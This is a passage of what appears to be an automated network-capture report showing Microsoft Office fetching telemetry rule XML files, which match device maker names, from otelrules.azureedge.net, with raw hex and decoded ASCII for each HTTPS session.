2024-12-07 09:51:34 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.6	49780	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:34 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:34 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 90a12f2a-001e-0079-1603-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095134Z-r1cf579d778dfdgnhC1EWRd3w000000001vg0000000017st x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:34 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.6	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:34 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:34 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 75599bc5-d01e-008e-7c03-48387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095134Z-r1cf579d7788pwqzhC1EWRrpd8000000028g00000000307f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:34 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.6	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:34 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:34 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 09188c3a-a01e-0021-2702-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095134Z-r1cf579d778lntp7hC1EWR9gg400000001eg00000000249t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:34 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.6	49781	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:34 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:34 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 90f2e2a0-001e-0014-5807-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095134Z-r1cf579d778d5zkmhC1EWRk6h800000002f0000000002mg7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:34 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.6	49784	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:36 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:36 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 1e88822f-901e-0029-0201-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095136Z-r1cf579d7788pwqzhC1EWRrpd800000002a0000000001qm2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:36 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.6	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:36 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:36 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: e333ec31-201e-003f-1d06-486d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095136Z-r1cf579d778xr2r4hC1EWRqvfs00000001yg000000003903 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:36 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.6	49786	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:36 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:36 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 22946cbe-b01e-0021-6403-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095136Z-r1cf579d778d5zkmhC1EWRk6h800000002c0000000003kp8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:36 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.6	49787	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:36 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:36 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 549300b5-601e-000d-6903-482618000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095136Z-r1cf579d77867vg8hC1EWR8knc00000001u00000000031r8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:36 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.6	49788	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:36 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:36 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: c11f8514-901e-0048-1305-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095136Z-r1cf579d778w59f9hC1EWRze6w0000000250000000003u2e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:36 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.6	49790	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:38 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:38 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: d196cbd9-901e-008f-5d03-4867a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095138Z-r1cf579d778g2t6ghC1EWRfggs00000001eg0000000022ba x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:38 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.6	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:38 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:38 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: d196cbda-901e-008f-5e03-4867a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095138Z-r1cf579d778dc6d7hC1EWR2vs800000002mg000000003c3e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:38 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.6	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:38 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
